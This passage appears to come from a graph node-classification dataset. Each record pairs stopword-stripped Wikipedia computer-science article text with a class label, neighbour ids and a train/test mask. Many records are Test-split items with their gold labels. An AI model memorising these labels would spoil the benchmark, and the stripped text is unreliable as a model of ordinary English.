used eight fifteen sites ran mts also available university college london ucl 1982 1984 snocone andrew koenig adds block-structured constructs snobol4 language snocone self-contained programming language rather proper superset snobol4 spitbol implementation also introduced number features using traditional structured programming keywords nevertheless used provide many equivalent capabilities normally thought structured programming notably nested if/then/else type constructs features since added recent snobol4 implementations many years commercial product april 2009 spitbol released free software gnu general public license according dave farber griswold polonsky finally arrived name symbolic expression interpreter sexi common backronyms snobol 'string oriented symbolic language quasi-initialism 'string oriented symbolic language",
    "neighbors": [
      512,
      2304,
      9345,
      515,
      3462,
      5510,
      8582,
      1804,
      2316,
      4492,
      5521,
      11153,
      2585,
      8474,
      8606,
      1952,
      2336,
      10145,
      4777,
      428,
      10560,
      8388,
      8262,
      11219,
      10324,
      2519,
      4057,
      2272,
      6369,
      8421,
      6248,
      11625,
      8430,
      7666,
      9845,
      502,
      3960,
      8057,
      7164,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10570,
    "label": 2,
    "text": "Ambient_(desktop_environment):ambient desktop environment ambient mui-based desktop environment morphos development started 2001 david gerber main goals fully asynchronous simple fast ambient remotely resembles workbench directory opus magellan trying mix best worlds ambient strictly follow amiga workbench interface paradigm still many similarities programs called tools program attributes called tooltypes data files projects directories drawers ambient localized various languages part morphos also available separately various visual effects ambient taking advantage hardware accelerated visual effects morphos native icon format ambient png icon built-in support amiga icon formats ambient introduced special icon format called datatype icons icon simply image file renamed include .info extension icons read using amiga datatype system 2005 david gerber released ambient source code gpl developed ambient development team",
    "neighbors": [
      8832,
      3841,
      139,
      5264,
      2193,
      9236,
      2197,
      3233,
      9249,
      4387,
      9762,
      8618,
      6062,
      7983,
      432,
      8369,
      8114,
      8115,
      6075,
      11076,
      5709,
      1742,
      850,
      6995,
      4564,
      6233,
      5729,
      5736,
      11370,
      5743,
      11123,
      9848,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10571,
    "label": 9,
    "text": "Side_effect_(computer_science):side effect computer science computer science operation function expression said side effect modifies state variable value outside local environment say observable effect besides returning value main effect invoker operation state data updated outside operation may maintained inside stateful object wider stateful system within operation performed example side effects include modifying non-local variable modifying static local variable modifying mutable argument passed reference performing i/o calling side-effect functions presence side effects program behaviour may depend history order evaluation matters understanding debugging function side effects requires knowledge context possible histories degree side effects used depends programming paradigm imperative programming commonly used produce side effects update system state contrast declarative programming commonly used report state system without side effects functional programming side effects rarely used lack side effects makes easier formal verifications program functional languages standard ml scheme scala restrict side effects customary programmers avoid functional language haskell expresses side effects i/o stateful computations using monadic actions assembly language programmers must aware hidden side effects—instructions modify parts processor state mentioned instruction mnemonic classic example hidden side effect arithmetic instruction implicitly modifies condition codes hidden side effect explicitly modifies register overt effect one potential drawback instruction set hidden side effects many instructions side effects single piece state like condition codes logic required update state sequentially may become performance bottleneck problem particularly acute processors designed pipelining since 1990 out-of-order execution processor may require additional control circuitry detect hidden side effects stall pipeline next instruction depends results effects absence side effects necessary sufficient condition referential transparency referential transparency means expression function call replaced value requires expression pure say expression must deterministic always give value input side-effect free side effects caused time taken operation execute usually ignored discussing side effects referential transparency cases hardware timing testing operations inserted specifically temporal side effects e.g codice_1 codice_2 instructions change state taking amount time complete function codice_3 side effects said idempotent sequential composition codice_4 called twice list arguments second call side effects assuming procedures called end first call start second call instance consider following python code codice_5 idempotent second call codice_5 argument change visible program state codice_7 already set 5 first call set 5 second call thus keeping value note distinct idempotence function composition codice_8 example absolute value idempotent function composition one common demonstration side effect behavior assignment operator c++ example assignment returns right operand side effect assigning value variable allows syntactically clean multiple assignment operator right associates equates result assigning 3 codice_9 gets assigned codice_10 presents potential hangup novice programmers may confuse",
    "neighbors": [
      2817,
      9345,
      4101,
      6926,
      6160,
      786,
      6163,
      9497,
      5920,
      8226,
      3876,
      4389,
      2470,
      4516,
      6821,
      9385,
      3630,
      8116,
      8502,
      3767,
      9911,
      7609,
      2618,
      2620,
      4797,
      5059,
      7671,
      7627,
      11083,
      11343,
      10584,
      7386,
      477,
      8289,
      10083,
      8293,
      8421,
      8554,
      9454,
      240,
      6775,
      3705,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 10572,
    "label": 1,
    "text": "Personal_Identity_System:personal identity system personal identity system pis established 1947 register pakistani citizens personal identity system replaced national database registration authority 1972 independence pakistan prime minister liaquat ali khan launched personal identity system pis program registered managed issued national identification cards citizens pakistan muslim refugees settling pakistan",
    "neighbors": [
      848
    ],
    "mask": "Test"
  },
  {
    "node_id": 10573,
    "label": 1,
    "text": "MyBatis:mybatis mybatis java persistence framework couples objects stored procedures sql statements using xml descriptor annotations mybatis free software distributed apache license 2.0 mybatis fork ibatis 3.0 maintained team includes original creators ibatis unlike orm frameworks mybatis map java objects database tables java methods sql statements mybatis lets use database functionality like stored procedures views queries complexity vendor proprietary features often good choice legacy de-normalized databases obtain full control sql execution simplifies coding compared jdbc sql statements executed single line mybatis provides mapping engine maps sql results object trees declarative way sql statements built dynamically using built-in language xml-like syntax apache velocity using velocity integration plugin mybatis integrates spring framework google guice feature allows one build business code free dependencies mybatis supports declarative data caching statement marked cacheable data retrieved database stored cache future executions statement retrieve cached data instead hitting database mybatis provides default cache implementation based java hashmap default connectors integrating oscache ehcache hazelcast memcached provides api plug cache implementations sql statements stored xml files annotations depicts mybatis mapper consists java interface mybatis annotations sentence executed follows sql statements mappings also externalized xml file follows statements also executed using mybatis api details please refer user guide available mybatis site see external links mybatis integrates spring framework module allows mybatis participate spring transactions also build mybatis mappers sessions inject beans following sample shows basic xml configuration sets mapper injects blogservice bean calling mybatis calling bean velocity language driver lets use apache velocity generate dynamic sql queries fly mybatis provides code generator mybatis generator introspect database table many tables generate mybatis artifacts needed perform crud operations create retrieve update delete eclipse plugin available preserve custom code case regeneration use eclipse plugin mybatis migrations java command line tool keeps track database schema changes managing ddl files known migrations migrations allows query current status database apply schema changes also undo also helps detect solve concurrent database schema changes made different developers mybatis project subsidiary ibatis 3.0 maintained team includes original creators ibatis project created may 19 2010 apache ibatis 3.0 published team announced development continue new name new home google code november 10 2013 project announced movement github",
    "neighbors": [
      3712,
      6277,
      3080,
      5403,
      8860,
      9634,
      5677,
      10413,
      7983,
      3763,
      7485,
      7742,
      9661,
      6860,
      4944,
      2901,
      479,
      5987,
      5612,
      9590,
      8825,
      9467,
      3710
    ],
    "mask": "None"
  },
  {
    "node_id": 10574,
    "label": 4,
    "text": "Fortinet:fortinet fortinet american multinational corporation headquartered sunnyvale california develops markets cybersecurity software appliances services firewalls anti-virus intrusion prevention endpoint security fortinet founded 2000 brothers ken michael xie company first product fortigate firewall later adding wireless access points sandboxing messaging security 2004 fortinet raised 90 million funding company went public november 2009 raising 156 million initial public offering 2016 fortinet released security fabric architecture included integration automation network security devices third-party vendors product later adapted include multi-cloud iot sd-wan capabilities prior fortinet ken xie founded served executive netscreen michael xie served executive servegate 2000 co-founded appligation inc company renamed apsecure december 2000 later renamed fortinet based phrase fortified networks 2004 amid fundraising fortinet netscreen acquired juniper networks 4 billion fortinet spent two years research development introducing first product fortigate 2002 company raised 13 million private funding 2000 early 2003 additional 30 million financing raised august 2003 followed 50 million march 2004 fortinet first channel program established october 2003 company began distributing products canada december 2003 westcon canada uk february 2004 norwood adam 2004 fortinet offices asia europe north america april 2005 german court issued preliminary injunction fortinet uk subsidiary relation source code gpl-licensed elements dispute ended month later fortinet agreed make source code available upon request fortinet became profitable third quarter 2008 late year company acquired database security auditing intellectual property iplocks extended job offers company 28 employees august 2009 acquired intellectual property assets woven systems ethernet switching company according market research firm idc november 2009 held 15 percent unified threat management market also 2009 crn magazine survey-based annual report card arc placed fortinet first network security hardware seventh 2007 november 2009 fortinet initial public offering wherein company planned raise 52.4 million sale 5.8 million shares 6 million shares also sold stockholders first day trading fortinet increased share price 9 12.50 price increased market 16.62 end first day trading company raised 156 million financing 2010 fortinet 324 million annual revenues held largest share market according idc july 2013 fortinet made changes reseller program security operations center soc box order provide monthly financing options managed security service vendors less experience less capital program previously reorganized 2006 enterprise companies fortinet made three notable acquisitions 2012 2015 company acquired app-hosting service xdn formerly known 3crowd december 2012 coyote point 2013 wi-fi hardware company meru networks 2015 june 2016 fortinet acquired security monitoring analytics software vendor accelops july 2014 fortinet announced technical certification program called network security expert nse included eight levels certification later march 2016 company launched network security academy help fill open cyber security jobs u.s. fortinet donated equipment provided information universities help train students jobs field also 2016 fortinet launched program called fortivet recruit military veterans cybersecurity jobs january 2017 announced philip quade former member nsa would become company chief information officer end 2017 fortinet reported 416.7 million revenue 15 percent increase previous year december 31 2017 fortinet 467 u.s. foreign-issued patents 291 pending june 2018 fortinet acquired bradford networks maker access control iot security solutions january 2019 announced fortinet founder ken xie would participate annual world economic forum held davos switzerland fortinet released first product fortigate firewall 2002 followed anti-spam anti-virus software fortigate updated use application-specific integrated circuit asic architecture fortinet products later merged network security including firewalls anti-spam anti-virus software one appliance april 2016 fortinet began building security fabric architecture multiple network security products could communicate one platform later year company added security information event management siem products analyzed hardware software security alerts high gigabit port density consolidated network security features mid-sized businesses enterprise branch locations addition cloud security september 2016 company announced would integrate siem products security systems vendors 2017 fortinet announced addition switches access points analyzers sandboxes cloud capabilities security fabric addition endpoints firewalls later 2017 fortinet created standalone subsidiary fortinet federal develop cybersecurity products government agencies fortinet historically received security effectiveness certifications nss labs gartner research consulting firm ranked fortinet within top three companies magic quadrant enterprise network firewalls measures market trends direction july 2018 company launched fortigate sd-wan proprietary sd-wan service fortigate sd-wan included within gartner magic quadrant wan edge infrastructure later year later 2018 fortinet released fortiguard ai better detect new unknown threats also announced 6.0 version fortios security operating system enhanced centralized management expanded cloud capabilities may 2004 trend micro competing cyber security defense company filed legal complaint fortinet though international trade commission initially ruled fortinet trend micro patents center dispute later declared invalid 2010 2005 fortinet responded questions related employee relationship burma prime minister use fortinet appliances internet censorship myanmar fortinet stated products sold third party resellers acknowledged us embargoes 2005 fortinet created fortiguard labs internal security research team 2008 fortinet researchers sent report facebook highlighting widget zango appeared tricking users downloading spyware 2014 fortinet four research development centers asia well others us canada france march 2014 fortinet founded cyber threat alliance cta palo alto networks order share security threat data across vendors later joined mcafee symantec 2015 cta published white paper cryptowall ransomware detailed attackers obtained 325 million ransoms paid victims regain access files april 2015 fortinet provided threat intelligence interpol order help apprehend ringleader several online scams based nigeria scams resulted compromise business emails ceo fraud cost one business 15 million following year march 2016 fortinet technology company cisco joined nato data-sharing agreement improve information security capabilities january 2017 fortinet worked interpol conduct investigation web security several southeast asian countries investigation identified compromised websites including government-operated web servers later month fortinet researchers discovered spyware scammed victims impersonating irs also 2017 researchers helped identify malware called rootnik ransomware called macransom targeted android macos systems respectively 2018 fortinet entered information-sharing agreement interpol",
    "neighbors": [
      2049,
      2563,
      6,
      1052,
      550,
      10790,
      2601,
      6699,
      8753,
      10291,
      569,
      9279,
      10308,
      2118,
      94,
      2654,
      2147,
      8816,
      10872,
      6779,
      9341,
      127,
      7809,
      131,
      1172,
      3732,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      7887,
      9423,
      10451,
      1242,
      6364,
      5860,
      10987,
      6382,
      8943,
      9971,
      1273,
      9983,
      1792,
      5891,
      4374,
      9496,
      6431,
      10531,
      5924,
      1318,
      8998,
      2859,
      3885,
      4403,
      9523,
      11577,
      9537,
      1858,
      11073,
      4421,
      331,
      1355,
      8024,
      4953,
      2907,
      11611,
      9055,
      11104,
      9569,
      3942,
      11622,
      4464,
      3955,
      4480,
      1925,
      1417,
      3981,
      10637,
      3482,
      4511,
      1440,
      5540,
      8614,
      8615,
      9640,
      939,
      4013,
      1970,
      10166,
      7103,
      5057,
      1994,
      5069,
      7121,
      10708,
      2005,
      4568,
      11225,
      8668,
      2539,
      9713,
      6643,
      10745,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10575,
    "label": 6,
    "text": "TUGZip:tugzip tugzip freeware file archiver microsoft windows handles great variety archive formats including commonly used ones like zip rar gzip bzip2 sqx 7z also view disk image files like bin c2d img iso nrg tugzip repairs corrupted zip archives encrypt files 6 different algorithms since release tugzip 3.5.0.0 development suspended due lack time kindahl side tugzip supports following file formats",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      5096,
      7529,
      4459,
      237,
      1646,
      4845,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 10576,
    "label": 3,
    "text": "Frogger:frogger frogger 1981 arcade game developed gremlin industries konami published sega object game direct frogs homes one one crossing busy road navigating river full hazards frogger positively received followed several clones sequels 2005 frogger various home video game incarnations sold 20 million copies worldwide including 5 million united states game found way popular culture including television music objective game guide frog empty frog homes top screen game starts three five seven frogs depending settings used operator losing ends game player control 4 direction joystick used navigate frog push direction causes frog hop direction frogger either single-player two players alternating frog starts bottom screen contains horizontal road occupied cars trucks bulldozers speeding along player must guide frog opposing lanes traffic avoid becoming roadkill results loss life road median strip separating two major parts screen upper portion screen consists river logs alligators turtles moving horizontally across screen jumping swiftly moving logs backs turtles alligators player guide frog safety player must avoid snakes otters open mouths alligators brightly colored lady frog sometimes log may carried bonus points top screen contains five frog homes destinations frog sometimes contain insects good lurking alligators bad game opening tune first verse japanese children song called inu omawarisan dog policeman japanese tunes played gameplay include themes anime hana ko lunlun araiguma rascal united states release kept opening song intact added yankee doodle softline 1982 stated frogger earned ominous distinction 'the arcade game ways die many different ways lose life illustrated skull crossbones symbol frog including hit running road vehicle jumping river water running snakes otters alligator jaws river jumping home invaded alligator staying top diving turtle completely submerged riding log alligator turtle side screen jumping home already occupied frog jumping side home bush running time five frogs homes game progresses next level increased difficulty five levels game gets briefly easier yet getting progressively harder level player 30 seconds guide frog one homes timer resets whenever life lost frog reaches home safely every forward step scores 10 points every frog arriving safely home scores 50 points 10 points also awarded per unused second time guiding lady frog home eating fly scores 200 points 5 frogs reach home end level player earns 1,000 points single bonus frog 20,000 points 99,990 points maximum high score achieved original arcade cabinet players may exceed score game keeps last 5 digits frogger ported many contemporary home systems several platforms capable accepting rom cartridges magnetic media systems commodore 64 received multiple versions game sierra on-line gained magnetic media rights sublicensed developers published systems normally supported sierra cornsoft published official trs-80/dragon 32 timex sinclair 1000 timex sinclair 2068 ports even atari 2600 received multiple releases cartridge cassette supercharger sierra released disk and/or tape ports c64 apple ii original 128k macintosh ibm pc atari 2600 supercharger well cartridge versions trs-80 color computer parker brothers received license sega cartridge versions produced cartridge ports frogger atari 2600 intellivision atari 5200 colecovision atari 8-bit family ti-99/4a vic-20 commodore 64 parker brothers spent 10 million advertising frogger sold three million cartridges company successful first-year product beating sales revenues previous best-seller merlin coleco also released stand-alone mini-arcade tabletop versions frogger along pac-man galaxian donkey kong sold three million units combined frogger also ported 1983 gakken compact vision tv boy one 6 launch titles ed driscoll reviewed atari vcs version frogger space gamer 58 driscoll commented liked arcade version save lot quarters price line cartridges also proves atari n't one making home versions major arcade games vcs danny goodman creative computing video arcade games wrote 1983 atari 2600 version frogger one detailed translations seen noting addition wraparound screen 2013 entertainment weekly named frogger one top ten games atari 2600 hasbro interactive released vastly expanded remake original microsoft windows playstation 1997 unlike original game consisted multiple levels different preceding one commercial success pc version alone selling nearly one million units less four months 1998 hasbro released series ports original game sega genesis super nes game com game boy game boy color port featured game different graphics sega genesis port featuring graphics original arcade game sega genesis snes versions last games released consoles north america despite using box art ports otherwise unrelated 1997 remake 2005 infospace teamed konami digital entertainment create mobile game frogger prizes players across u.s. competed multiplayer tournaments win daily weekly prizes 2006 mobile game version frogger grossed 10 million united states java port game available compatible mobile phones port frogger released xbox live arcade xbox 360 july 12 2006 developed digital eclipse published konami two new gameplay modes versus speed mode co-op play music including familiar frogger theme removed version replaced music version included compilation konami classics vol 1 home versions frogger numerous sequels including frogger great quest frogger helmet chaos frogger shown bipedal wearing shirt crossed-out truck frogger also inspired unofficial sequel sega 1991 called ribbit featured improved graphics simultaneous two-player action additionally prototype game based gameplay elements frogger developed sega game gear never released prototype contained additional features redesigned levels unofficial clones include ribbit apple ii 1981 acornsoft hopper 1983 bbc micro acorn electron f software frogger 1983 bbc micro zx spectrum pss ’ personal software services hopper oric 1 uk 1983 later release oric atmos froggy zx spectrum released djl software 1984 solo software frogger sharp mz-700 1984 uk version newbrain name leap frog several clones retained basic gameplay frogger changing style and/or plot pacific coast highway 1982 atari 8-bit family splits gameplay two alternating screens one highway one water preppie 1982 atari 8-bit family changes frog preppy retrieving golf balls country club frostbite 1983 atari 2600 uses frogger river gameplay arctic theme crossy road 2014 ios android windows phone randomly generated series road river sections game one endless level one life single point given forward hop atari 2600 game freeway often considered clone frogger game developed independently released 1981 2008 city melbourne created spin-off called grogger part public service campaign encourage people take safe transportation home night drinking frogger tied american popular culture found film television music 1983 frogger made animated television debut segment cbs saturday supercade cartoon lineup frogger voiced bob sarlatte worked investigative reporter segment aired one season 1998 game featured seinfeld episode frogger jerry george visit soon-to-be-closed pizzeria frequented teenagers discover frogger machine still place george decade-old high score still recorded buys machine tries get across street without letting lose power would erase high score initials glc season 4 episode george lopez friends n't let friends marry drunks george says son max play one frog tries cross street obvious reference frogger frogger also appears films wreck-it ralph pixels ralph breaks internet music frogger referenced also found 1982 buckner garcia recorded song called froggy lament using sound effects game released album pac-man fever punk band bad religion recorded song called frogger traffic los angeles song includes sample game theme music beginning frontman greg graffin claims playing frogger life result traffic song included band 1985 ep back known 2004 remaster debut album could hell worse uk girl group sugababes sampled coin-insert tone frogger game 2002 hit single freak like addition film television music frogger found popular culture mediums well 2006 group austin texas used modified roomba dressed frogger play real-life version game realm science frogger name given transposon jumping gene family fruit fly drosophila melanogaster november 26 1999 rickey world famous sauce offered 10,000 first person could score 1,000,000 points frogger 1,000 new world record prior january 1 2000 march 25 2005 robert mruczek offered 1,000 beating fictitious world record 860,630 set george costanza famous episode seinfeld 250 new world record end year december 1 2006 john cunningham offered 250 exceeding fictitious world record 860,630 points february 28 2007 one ever able achieve bounties scores surpassed bounties expired first score verified beaten fictional george costanza seinfeld score 860,630 points set pat laffaye december 22 2009 896,980 points surpassed michael smith springfield virginia usa score 970,440 points july 15 2012 current frogger world record holder pat laffaye westport connecticut usa august 15 2017 scored 1,029,990 points becoming first person ever break one million points original arcade machine",
    "neighbors": [
      9732,
      4357,
      7051,
      6797,
      10644,
      4518,
      4524,
      5677,
      10287,
      11311,
      6449,
      10931,
      8887,
      10695,
      10316,
      4312,
      3039,
      9957,
      8937,
      1776
    ],
    "mask": "Test"
  },
  {
    "node_id": 10577,
    "label": 0,
    "text": "Statistical_semantics:statistical semantics linguistics statistical semantics applies methods statistics problem determining meaning words phrases ideally unsupervised learning degree precision least sufficient purpose information retrieval term statistical semantics first used warren weaver well-known paper machine translation argued word sense disambiguation machine translation based co-occurrence frequency context words near given target word underlying assumption word characterized company keeps advocated j.r. firth assumption known linguistics distributional hypothesis emile delavenay defined statistical semantics statistical study meanings words frequency order recurrence furnas et al 1983 frequently cited foundational contribution statistical semantics early success field latent semantic analysis research statistical semantics resulted wide variety algorithms use distributional hypothesis discover many aspects semantics applying statistical techniques large corpora statistical semantics focuses meanings common words relations common words unlike text mining tends focus whole documents document collections named entities names people places organizations statistical semantics subfield computational semantics turn subfield computational linguistics natural language processing many applications statistical semantics listed also addressed lexicon-based algorithms instead corpus-based algorithms statistical semantics one advantage corpus-based algorithms typically labour-intensive lexicon-based algorithms another advantage usually easier adapt new languages lexicon-based algorithms however best performance application often achieved combining two approaches",
    "neighbors": [
      1825,
      1890,
      7780,
      9796,
      4070,
      11206,
      4072,
      1737,
      7599,
      9935,
      2578,
      10452,
      8440,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 10578,
    "label": 4,
    "text": "Anti-Spam_Research_Group:anti-spam research group anti-spam research group asrg research group started within internet research task force irtf charter concluded 18 march 2013 still reference melting pot anti-spam research theorization particular wiki lives dedicated research curbing spam internet-wide level consists mailing list coordinate work small web site wiki irtf groups asrg contributed internet engineering task force ietf process drafts documents assistance creation new working groups one ietf group spun asrg marid asrg sporadically active little evolves anti-spam landscape activity happening mailing list 2008 asrg worked internet drafts dnsbls 2010 standardization feedback loop email",
    "neighbors": [
      8224,
      8130,
      3145,
      6762,
      4272,
      6517,
      9532,
      8093
    ],
    "mask": "None"
  },
  {
    "node_id": 10579,
    "label": 8,
    "text": "Query_string:query string internet query string part uniform resource locator url assigns values specified parameters query string commonly includes fields added base url web browser client application example part html form web server handle hypertext transfer protocol request either reading file file system based url path handling request using logic specific type resource cases special logic invoked query string available logic use processing along path component url typical url containing query string follows server receives request page may run program passing query string case codice_1 unchanged program question mark used separator part query string web frameworks may provide methods parsing multiple parameters query string separated delimiter example url multiple query parameters separated ampersand codice_2 order queries n't matter codice_3 codice_4 produce results exact structure query string standardized methods used parse query string may differ websites link web page may url contains query string html defines three ways user agent generate query string one original uses contain content html form also known web form particular form containing fields codice_5 codice_6 codice_7 submitted content fields encoded query string follows definitive standard web frameworks allow multiple values associated single field e.g codice_11 field form query string contains pair codice_12 web forms may include fields visible user fields included query string form submitted convention w3c recommendation w3c recommends web servers support semicolon separators addition ampersand separators allow application/x-www-form-urlencoded query strings urls within html documents without entity escape ampersands form content encoded url query string form submission method get encoding used default submission method post result submitted http request body rather included modified url forms added html browsers rendered element single-line text-input control text entered control sent server query string addition get request base url another url specified attribute intended allow web servers use provided text query criteria could return list matching pages text input indexed search control submitted encoded query string follows though element deprecated browsers longer support render still vestiges indexed search existence example source special handling plus sign 'codice_13 within browser url percent encoding today deprecation indexed search redundant codice_15 also web servers supporting cgi e.g. apache process query string command line arguments contain equals sign 'codice_8 per section 4.4 cgi 1.1 cgi scripts still depend use historic behavior urls embedded html characters part url example space characters special meaning url example character codice_17 used specify subsection fragment document html forms character codice_8 used separate name value uri generic syntax uses url encoding deal problem html forms make additional substitutions rather applying percent encoding characters space encoded 'codice_13 codice_15 html 5 specifies following transformation submitting html forms get method web server following brief summary algorithm octet corresponding tilde codice_35 permitted query strings rfc3986 required percent-encoded html forms codice_36 encoding space 'codice_13 selection as-is characters distinguishes encoding rfc 3986 form embedded html page follows form action= cgi-bin/test.cgi method= get /form user inserts strings “ field ” “ clear already ” two text fields presses submit button program codice_38 program specified codice_39 attribute codice_40 element example receive following query string codice_41 form processed server cgi script script may typically receive query string environment variable named codice_42 program receiving query string ignore part requested url corresponds file program whole query string ignored however regardless whether query string used whole url including stored server log files facts allow query strings used track users manner similar provided http cookies work every time user downloads page unique identifier must chosen added query string urls links page contains soon user follows one links corresponding url requested server way download page linked previous one example web page containing following requested unique string codice_43 chosen page modified follows addition query string change way page shown user user follows example first link browser requests page codice_44 server ignores follows codice_45 sends page codice_46 expected adding query string links well way subsequent page request user carry query string codice_43 making possible establish pages viewed user query strings often used association web beacons main differences query strings used tracking http cookies according http specification various ad hoc limitations request-line length found practice recommended http senders recipients support minimum request-line lengths 8000 octets url long web server fails 414 request-uri long http status code common workaround problems use post instead get store parameters request body length limits request bodies typically much higher url length example limit post size default 2 mb iis 4.0 128 kb iis 5.0 limit configurable apache2 using codice_48 directive specifies number bytes 0 meaning unlimited 2147483647 2 gb allowed request body",
    "neighbors": [
      2945,
      899,
      7965,
      9762,
      2470,
      7847,
      9780,
      2485,
      1206,
      3642,
      2106,
      4797,
      1096,
      10959,
      10450,
      225,
      865,
      10466,
      113,
      6002,
      7673
    ],
    "mask": "Test"
  },
  {
    "node_id": 10580,
    "label": 4,
    "text": "Discretionary_access_control:discretionary access control computer security discretionary access control dac type access control defined trusted computer system evaluation criteria means restricting access objects based identity subjects and/or groups belong controls discretionary sense subject certain access permission capable passing permission perhaps indirectly subject unless restrained mandatory access control discretionary access control commonly discussed contrast mandatory access control mac occasionally system whole said discretionary purely discretionary access control way saying system lacks mandatory access control hand systems said implement mac dac simultaneously dac refers one category access controls subjects transfer among mac refers second category access controls imposes constraints upon first meaning term practice clear-cut definition given tcsec standard tcsec definition dac impose implementation least two implementations owner widespread example capabilities term dac commonly used contexts assume every object owner controls permissions access object probably many systems implement dac using concept owner tcsec definition say anything owners technically access control system n't concept owner meet tcsec definition dac users owners dac implementation ability make policy decisions and/or assign security attributes straightforward example unix file mode represent write read execute 3 bits user group others prepended another bit indicates additional characteristics another example capability systems sometimes described providing discretionary controls permit subjects transfer access subjects even though capability-based security fundamentally restricting access based identity subjects capability systems general allow permissions passed subject subject wanting pass permissions must first access receiving subject subjects generally access subjects system",
    "neighbors": [
      1792,
      8838,
      7,
      2193,
      8210,
      3480,
      3360,
      3616,
      7206,
      808,
      2477,
      4912,
      2737,
      4404,
      5812,
      10170,
      5573,
      11470,
      210,
      8402,
      10835,
      10968,
      7260,
      2013,
      6625,
      4067,
      9958,
      8302,
      7663,
      6902,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10581,
    "label": 9,
    "text": "Closure_(computer_programming):closure computer programming programming languages closure also lexical closure function closure technique implementing lexically scoped name binding language first-class functions operationally closure record storing function together environment environment mapping associating free variable function variables used locally defined enclosing scope value reference name bound closure created unlike plain function closure allows function access captured variables closure copies values references even function invoked outside scope concept closures developed 1960s mechanical evaluation expressions λ-calculus first fully implemented 1970 language feature pal programming language support lexically scoped first-class functions peter j. landin defined term closure 1964 environment part control part used secd machine evaluating expressions joel moses credits landin introducing term closure refer lambda expression whose open bindings free variables closed bound lexical environment resulting closed expression closure usage subsequently adopted sussman steele defined scheme 1975 lexically scoped variant lisp became widespread term closure often used synonym anonymous function though strictly anonymous function function literal without name closure instance function value whose non-local variables bound either values storage locations depending language see lexical environment section example following python code values codice_1 codice_2 closures cases produced returning nested function free variable enclosing function free variable binds value parameter codice_3 enclosing function closures codice_1 codice_2 functionally identical difference implementation first case used nested function name codice_6 second case used anonymous nested function using python keyword codice_7 creating anonymous function original name used defining irrelevant closure value like value need assigned variable instead used directly shown last two lines example usage may deemed anonymous closure nested function definitions closures free variable yet bound enclosing function evaluated value parameter free variable nested function bound creating closure returned enclosing function lastly closure distinct function free variables outside scope non-local variables otherwise defining environment execution environment coincide nothing distinguish static dynamic binding distinguished names resolve values example program functions free variable codice_3 bound non-local variable codice_3 global scope executed environment codice_3 defined immaterial whether actually closures often achieved function return since function must defined within scope non-local variables case typically scope smaller also achieved variable shadowing reduces scope non-local variable though less common practice less useful shadowing discouraged example codice_11 seen closure codice_3 body codice_11 bound codice_3 global namespace codice_3 local codice_6 use closures associated languages functions first-class objects functions returned results higher-order functions passed arguments function calls functions free variables first-class returning one creates closure includes functional programming languages lisp ml well many modern multi-paradigm languages python rust closures also frequently used callbacks particularly event handlers javascript used interactions dynamic web page closures also used continuation-passing style hide state constructs objects control structures thus implemented closures languages closure may occur function defined within another function inner function refers local variables outer function run-time outer function executes closure formed consisting inner function code references upvalues variables outer function required closure closures typically appear languages first-class functions—in words languages enable functions passed arguments returned function calls bound variable names etc. like simpler types strings integers example consider following scheme function example lambda expression codice_17 appears within function codice_18 lambda expression evaluated scheme creates closure consisting code lambda expression reference codice_19 variable free variable inside lambda expression closure passed codice_20 function calls repeatedly determine books added result list discarded closure reference codice_19 use variable time codice_20 calls function codice_20 might defined completely separate file example rewritten javascript another popular language support closures codice_24 keyword used instead codice_7 codice_26 method instead global codice_20 function otherwise structure effect code function may create closure return following example closure case outlives execution function creates variables codice_11 codice_29 live function codice_30 returns even though execution left scope longer visible languages without closures lifetime automatic local variable coincides execution stack frame variable declared languages closures variables must continue exist long existing closures references commonly implemented using form garbage collection closure used associate function set private variables persist several invocations function scope variable encompasses closed-over function accessed program code stateful languages closures thus used implement paradigms state representation information hiding since closure upvalues closed-over variables indefinite extent value established one invocation remains available next closures used way longer referential transparency thus longer pure functions nevertheless commonly used impure functional languages scheme closures many uses note speakers call data structure binds lexical environment closure term usually refers specifically functions closures typically implemented special data structure contains pointer function code plus representation function lexical environment i.e. set available variables time closure created referencing environment binds non-local names corresponding variables lexical environment time closure created additionally extending lifetime least long lifetime closure closure entered later time possibly different lexical environment function executed non-local variables referring ones captured closure current environment language implementation easily support full closures run-time memory model allocates automatic variables linear stack languages function automatic local variables deallocated function returns however closure requires free variables references survive enclosing function execution therefore variables must allocated persist longer needed typically via heap allocation rather stack lifetime must managed survive closures referencing longer use explains typically languages natively support closures also use garbage collection alternatives manual memory management non-local variables explicitly allocating heap freeing done using stack allocation language accept certain use cases lead undefined behaviour due dangling pointers freed automatic variables lambda expressions c++11 nested functions gnu c. funarg problem functional argument problem describes difficulty implementing functions first class objects stack-based programming language c c++ similarly version 1 assumed programmer knows delegates automatic local variables references invalid return definition scope automatic local variables stack – still permits many useful functional patterns complex cases needs explicit heap allocation variables version 2 solved detecting variables must stored heap performs automatic allocation uses garbage collection versions need track usage variables passed strict functional languages immutable data e.g erlang easy implement automatic memory management garbage collection possible cycles variables references example erlang arguments variables allocated heap references additionally stored stack function returns references still valid heap cleaning done incremental garbage collector ml local variables lexically scoped hence define stack-like model since bound values objects implementation free copy values closure data structure way invisible programmer scheme algol-like lexical scope system dynamic variables garbage collection lacks stack programming model suffer limitations stack-based languages closures expressed naturally scheme lambda form encloses code free variables environment persist within program long possibly accessed used freely scheme expression closures closely related actors actor model concurrent computation values function lexical environment called acquaintances important issue closures concurrent programming languages whether variables closure updated updates synchronized actors provide one solution closures closely related function objects transformation former latter known defunctionalization lambda lifting see also closure conversion different languages always common definition lexical environment definitions closure may vary also commonly held minimalist definition lexical environment defines set bindings variables scope also closures language capture however meaning variable binding also differs imperative languages variables bind relative locations memory store values although relative location binding change runtime value bound location languages since closure captures binding operation variable whether done closure performed relative memory location often called capturing variable reference example illustrating concept ecmascript one language function codice_31 closures referred 